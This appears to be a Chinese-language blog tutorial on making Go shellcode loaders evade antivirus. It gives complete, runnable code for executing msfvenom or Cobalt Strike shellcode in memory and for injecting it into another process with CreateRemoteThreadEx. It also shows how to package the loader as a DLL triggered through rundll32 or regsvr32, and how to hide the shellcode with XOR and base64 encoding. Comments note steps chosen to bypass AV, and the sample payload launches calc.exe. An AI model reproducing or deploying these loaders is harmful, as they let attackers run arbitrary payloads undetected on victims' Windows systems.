golang shellcode免杀

发表于 更新于 分类于 阅读次数:

获得原始shellcode

注意:生成shellcode时需要根据系统架构选择x86或者x64位shellcode,否则可能无法执行或者导致注入的原始进程崩溃。

msfvenom

弹出计算机测试使用的shellcode:

1
msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
1
byte[] buf = new byte[276] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };

cobalt strike

截图

截图

截图

此时替换斜杠,0

截图

截图

此时得到可以放入golang的shellcode

需要用到的包

“golang.org/x/sys/windows” 提供系统函数调用支持,可以直接操作系统底层接口,提供dll函数调用支持。

“golang.org/x/sys/syscall” Syscall可能被弃用,但仍然是一种依赖,可以直接利用,是系统底层包,根据系统的不同,该包各不相同。

“unsafe” 用来直接操作系统内存。

“github.com/mitchellh/go-ps” 用来操作进程

“C” 启用CGO特性,为了导出dll

原理

一个简单的shellcode加载器应该有以下几个部分:读取并处理shellcode、调用win api为shellcode分配内存、将shellcode写入内存,最后执行内存中的shellcode。

shellcode的多种加载方式

直接系统调用|创建线程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
/*
教程地址:https://www.blackhillsinfosec.com/webcast-shellcode-execution-with-golang/
*/

package main

import (
	"fmt"
	"syscall"
	"unsafe"

	"golang.org/x/sys/windows"
)

// msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
// 原始payload
var s = []byte{
	0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
	0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
	0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
	0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
	0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
	0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
	0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
	0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
	0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
	0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
	0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
	0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
	0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
	0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
	0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
	0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
	0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
	0x63, 0x2e, 0x65, 0x78, 0x65, 0x00}

func main() {
	method2_CreatThread(s)
}

// 方法1:直接调用
func method1_SysCall(sc []byte) {
	// 懒加载kernel32.dll,创建一个*windows.LazyDll对象
	// kernel32.dll控制着系统的内存管理、数据的输入输出操作和中断处理
	kernel32 := windows.NewLazyDLL("kernel32.dll")

	// 使用newProc访问kernel32中的命名函数:RtlMoveMemory
	// RtlMoveMemory用来将源内存块的内容复制到目标内存块,并支持重叠的源内存块和目标内存块。
	// 此处获取RtlMoveMomory对象
	RtlMoveMemory := kernel32.NewProc("RtlMoveMemory")

	// windows提供的底层方法,用来更改内存状态
	// 在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态。此函数分配的内存自动初始化为零。
	// 此处调用分配了一块内存空间
	addr, err := windows.VirtualAlloc(uintptr(0), uintptr(len(sc)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
	if err != nil {
		panic(fmt.Sprintf("[!] VirtualAlloc():%s", err.Error()))
	}

	// 使用RtlMoveMemory将shellcode写入内存
	RtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))

	// https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect
	var oldProtect uint32
	//VirtualProtect在调用进程的虚拟地址空间中更改对已提交页面区域的保护
	err = windows.VirtualProtect(addr, uintptr(len(sc)), windows.PAGE_EXECUTE_READWRITE, &oldProtect)
	if err != nil {
		panic(fmt.Sprintf("[!] VirtualProtect():%s", err.Error()))
	}

	syscall.Syscall(addr, 0, 0, 0, 0)
}

// 方法二:在进程中创建子线程
// method2: Creating thread in same process
func method2_CreatThread(sc []byte) {
	// 加载方法
	kernel32 := windows.NewLazyDLL("kernel32.dll")
	// Runtime library move Memory 用来复制内存
	RtlMoveMemory := kernel32.NewProc("RtlMoveMemory")
	// CreateThread 用来创建线程
	CreateThread := kernel32.NewProc("CreateThread")

	//分配内存 alloc is allocation 分配的意思,已经内置在golang的windows库中
	//参数1:要分配的区域的起始地址 参数2:区域的大小以字节为单位 参数3:内存分配类型 参数4:访问类型
	// 参数3解析:要在一个步骤中保留和提交页面,请使用调用VirtualAllocMEM_COMMIT | MEM_RESERVE。
	// 参数4解析:区域不可执行代码,应用程序可以读写该区域。
	addr, err := windows.VirtualAlloc(uintptr(0), uintptr(len(sc)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
	if err != nil {
		panic(fmt.Sprintf("[!] VirtualAllic():%s", err.Error()))
	}

	// 写入内存
	// copy shellcode into allocated memory
	RtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))

	var oldProtect uint32
	// 更改内存状态,之前是READWRITE(为了绕过AV),现在改成PAGE_EXECUTE_READ(为了绕过AV)
	// VirtualProtect:在调用进程的虚拟地址空间中更改对已提交页面区域的保护
	// 参数1:起始地址 参数2:内存长度 参数3:要更改的类型
	// 参数4:指向变量的指针,该变量接收指定页面区域中第一页的先前访问保护值。如果此参数为NULL或未指向有效变量,则函数失败。
	// 执行完成后,oldProtect == PAGE_READWRITE = 0x00000004 == 4
	err = windows.VirtualProtect(addr, uintptr(len(sc)), windows.PAGE_EXECUTE_READ, &oldProtect)
	if err != nil {
		panic(fmt.Sprintf("[!] VirtualProtect():%s", err.Error()))
	}
	fmt.Println(oldProtect)

	// 创建线程,六个参数
	// https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread
	// 参数1:线程属性,确定返回的句柄是否可以被子进程继承
	// 参数2:堆栈的初始大小,以字节为单位,如果此参数为零,则新线程使用可执行文件的默认大小
	// 参数3:指向要由线程执行的应用程序定义函数的指针,即指向内存
	// 参数4:指向要传递给线程的变量的指针
	// 参数5:控制线程创建的标志。如果为0,线程在创建后立即运行。
	// 参数6:指向接收线程标识符的变量的指针。如果此参数为 NULL,则不返回线程标识符。
	// 返回值:如果函数成功,则返回值是新线程的句柄。如果函数失败,则返回值为NULL。要获取扩展的错误信息,请调用 GetLastError。
	thread, _, err := CreateThread.Call(0, 0, addr, uintptr(0), 0, 0)
	if err.Error() != "The operation completed successfully." {
		panic(fmt.Sprintf("[!] Created Thread():%s", err.Error()))
	}
	fmt.Println(err.Error())

	//保持程序运行
	_, _ = windows.WaitForSingleObject(windows.Handle(thread), 0xFFFFFFFF)
}

进程注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
package runsc

import (
	"fmt"
	"strings"
	"unsafe"

	ps "github.com/mitchellh/go-ps"
	"golang.org/x/sys/windows"
)

func Method3injectProcess(sc []byte, proc string) {
	Pid := findProcess(proc)
	if Pid == 0 || Pid == -1 {
		panic(`[!] Can't find a process that can be injected, or the process cannot be injected!`)
	}

	kernel32 := windows.NewLazySystemDLL("kernel32.dll")
	//在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。该函数将其分配的内存初始化为零。
	VirtualAllocEx := kernel32.NewProc("VirtualAllocEx")
	//在指定进程的虚拟地址空间中更改对已提交页面区域的保护
	VirtualProtectEx := kernel32.NewProc("VirtualProtectEx")
	//将数据写入指定进程中的内存区域。要写入的整个区域必须可访问,否则操作将失败。
	WriteProcessMemory := kernel32.NewProc("WriteProcessMemory")
	//创建在另一个进程的虚拟地址空间中运行的线程,并可选择指定扩展属性,例如处理器组关联性。
	CreateRemoteThreadEx := kernel32.NewProc("CreateRemoteThreadEx")

	openProcess, err := windows.OpenProcess(windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_READ|windows.PROCESS_VM_WRITE, false, uint32(Pid))
	if err != nil {
		panic(fmt.Sprintf("[!] Open process err:%s", err.Error()))
	}

	addr, _, err := VirtualAllocEx.Call(uintptr(openProcess), 0, uintptr(len(sc)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
	if err != nil && !strings.Contains(err.Error(), "successfully") {
		panic(fmt.Sprintf("[!] Virtuallloc err:%s", err.Error()))
	}

	_, _, err = WriteProcessMemory.Call(uintptr(openProcess), addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	if err != nil && !strings.Contains(err.Error(), "successfully") {
		panic(fmt.Sprintf("[!] WriteProcessMemory err:%s", err.Error()))
	}

	op := 0
	_, _, err = VirtualProtectEx.Call(uintptr(openProcess), addr, uintptr(len(sc)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&op)))
	if err != nil && !strings.Contains(err.Error(), "successfully") {
		panic(fmt.Sprintf("[!] VirtualProtectEx err:%s", err.Error()))
	}

	_, _, err = CreateRemoteThreadEx.Call(uintptr(openProcess), 0, 0, addr, 0, 0, 0)
	if err != nil && !strings.Contains(err.Error(), "successfully") {
		panic(fmt.Sprintf("[!] CreateRemoteThreadEx err:%s", err.Error()))
	}

	errCloseHandle := windows.CloseHandle(openProcess)
	if errCloseHandle != nil {
		panic(fmt.Sprintf("[!] CloseHandle err:%s", errCloseHandle.Error()))
	}

}

// 查找可以被注入的进程
func findProcess(proc string) int {
	processList, err := ps.Processes()
	if err != nil {
		return -1
	}
	for _, p := range processList {
		if p.Executable() != proc {
			continue
		}
		// 查询是否可以操作进程地址空间
		p1, errOpenProcess := windows.OpenProcess(windows.PROCESS_VM_OPERATION, false, uint32(p.Pid()))
		if errOpenProcess != nil {
			continue
		}
		windows.CloseHandle(p1)
		return p.Pid()
	}
	return 0
}

DLL白名单

先决条件

使用CGI编译成DLL,需要提前安装mingw,线程模型务必选择win32

已经安装的,使用cpp -v查看

截图

普通Dll导出

定义一个函数,加载shellcode,然后导出该函数,封装到dll中,下面代码中Calc函数为CGO导出的函数,首先需要import “C”,然后在要导出的DLL前添加导出标记://export <函数名>,需要被导出的函数首字母需要大写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
/*
教程地址:https://www.blackhillsinfosec.com/webcast-shellcode-execution-with-golang/
*/

package main

import (
	"C"
	"fmt"
	"unsafe"

	"golang.org/x/sys/windows"
)

// msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
// 原始payload
var s = []byte{
	0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
	0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
	0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
	0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
	0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
	0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
	0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
	0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
	0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
	0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
	0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
	0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
	0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
	0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
	0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
	0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
	0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
	0x63, 0x2e, 0x65, 0x78, 0x65, 0x00}

//export Calc
func Calc() {
	method2_CreatThread(s)
}

// 方法二:在进程中创建子线程
// method2: Creating thread in same process
func method2_CreatThread(sc []byte) {
	// 加载方法
	kernel32 := windows.NewLazyDLL("kernel32.dll")
	// Runtime library move Memory 用来复制内存
	RtlMoveMemory := kernel32.NewProc("RtlMoveMemory")
	// CreateThread 用来创建线程
	CreateThread := kernel32.NewProc("CreateThread")

	//分配内存 alloc is allocation 分配的意思,已经内置在golang的windows库中
	//参数1:要分配的区域的起始地址 参数2:区域的大小以字节为单位 参数3:内存分配类型 参数4:访问类型
	// 参数3解析:要在一个步骤中保留和提交页面,请使用调用VirtualAllocMEM_COMMIT | MEM_RESERVE。
	// 参数4解析:区域不可执行代码,应用程序可以读写该区域。
	addr, err := windows.VirtualAlloc(uintptr(0), uintptr(len(sc)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
	if err != nil {
		panic(fmt.Sprintf("[!] VirtualAllic():%s", err.Error()))
	}

	// 写入内存
	// copy shellcode into allocated memory
	RtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))

	var oldProtect uint32
	// 更改内存状态,之前是READWRITE(为了绕过AV),现在改成PAGE_EXECUTE_READ(为了绕过AV)
	// VirtualProtect:在调用进程的虚拟地址空间中更改对已提交页面区域的保护
	// 参数1:起始地址 参数2:内存长度 参数3:要更改的类型
	// 参数4:指向变量的指针,该变量接收指定页面区域中第一页的先前访问保护值。如果此参数为NULL或未指向有效变量,则函数失败。
	// 执行完成后,oldProtect == PAGE_READWRITE = 0x00000004 == 4
	err = windows.VirtualProtect(addr, uintptr(len(sc)), windows.PAGE_EXECUTE_READ, &oldProtect)
	if err != nil {
		panic(fmt.Sprintf("[!] VirtualProtect():%s", err.Error()))
	}
	fmt.Println(oldProtect)

	// 创建线程,六个参数
	// https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread
	// 参数1:线程属性,确定返回的句柄是否可以被子进程继承
	// 参数2:堆栈的初始大小,以字节为单位,如果此参数为零,则新线程使用可执行文件的默认大小
	// 参数3:指向要由线程执行的应用程序定义函数的指针,即指向内存
	// 参数4:指向要传递给线程的变量的指针
	// 参数5:控制线程创建的标志。如果为0,线程在创建后立即运行。
	// 参数6:指向接收线程标识符的变量的指针。如果此参数为 NULL,则不返回线程标识符。
	// 返回值:如果函数成功,则返回值是新线程的句柄。如果函数失败,则返回值为NULL。要获取扩展的错误信息,请调用 GetLastError。
	thread, _, err := CreateThread.Call(0, 0, addr, uintptr(0), 0, 0)
	if err.Error() != "The operation completed successfully." {
		panic(fmt.Sprintf("[!] Created Thread():%s", err.Error()))
	}
	fmt.Println(err.Error())

	//保持程序运行
	_, _ = windows.WaitForSingleObject(windows.Handle(thread), 0xFFFFFFFF)
}

编译go源码,导出为gosc.dll:

1
go build -buildmode=c-shared -o gosc.dll .\main.go

命令执行后,会生成gosc.h文件:

截图

可以使用dumpbin查看dll中封装的函数,dumpbin在安装visual studio时,可以勾选windows开发环境以及c++支持自动安装。

1
dumpbin.exe -exports <dll路径> |more

截图

此时可以使用rundll32.exe或者regsvr32.exe执行dll中方法。

1
rundll32.exe gosc.dll,Calc

导出支持REGSVR32的DLL

regsvr32运行dll则不需要加任何参数,但是对DLL的入口点有要求,需要DLL有四个入口点,这四个入口点不一定都使用,但是必须存在,我们可以只使用其中一个,四个点的返回值都是true,这四个入口点分别是:EntryPointDllRegisterServerDllUnregisterServerDllInstall,视频中推荐使用DllInstall

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
使用DllInstall//export EntryPoint
func EntryPoint() bool {
	return true
}

//export DllRegisterServer
func DllRegisterServer() bool {
	return true
}

//export DllUnregisterServer
func DllUnregisterServer() bool {
	return true
}

//export DllInstall
func DllInstall() bool {
	method2_CreatThread(xorEncryption(s, key))
	return true
}

在四个入口点分别有不同的参数去调用不同入口点,如果在DllInstall入口点,则使用/i参数调用

1
regsvr32 /i <Dll路径>

其他入口点请查阅帮助:

截图

dll文件本身和普通的pe文件就有很大区别,本身就可以过很多杀软,当使用DllInstall入口时,就更加隐蔽了。

截图

shellcode混淆,去除shellcode特征

XOR加密

如果将shellcode直接写入加载器编译,那么很容易就被杀软静态分析出来,所以这里需要对shellcode混淆,在程序执行的时候再将shellcode解密,目前比较简单的是xor加解密,也就是异或加解密,具体原理不赘述,百度搜索异或交换即可得到清晰明了的原理。

将[]byte逐位异或,也就是单字节xor加解密:

1
2
3
4
5
6
7
8
9
// 单字节xor加解密
func xorEncryption(buf []byte, xorchar byte) []byte {
	var res []byte = make([]byte, len(buf))
	for index, b := range buf {
		//fmt.Printf("%#v ", b)
		res[index] = xorchar ^ b
	}
	return res
}

buf就是shellcode,xorchar就是key,因为是xor加密,所以既可以用来加密也可以用来解密,百度搜索异或交换即可得到清晰明了的原理。

base64编码shellcode

1
2
3
4
5
6
7
8
9
10
// base64加解
func bs64e(b1 []byte) string {
	return base64.StdEncoding.EncodeToString(b1)
}

// base64解密
func bs64d(s1 string) []byte {
	b1, _ := base64.RawStdEncoding.DecodeString(s1)
	return b1
}

还可以通过base64编码进一步加解密shellcode

关于动态免杀

关于动态免杀原理和指南:

https://labs.withsecure.com/blog/bypassing-windows-defender-runtime-scanning/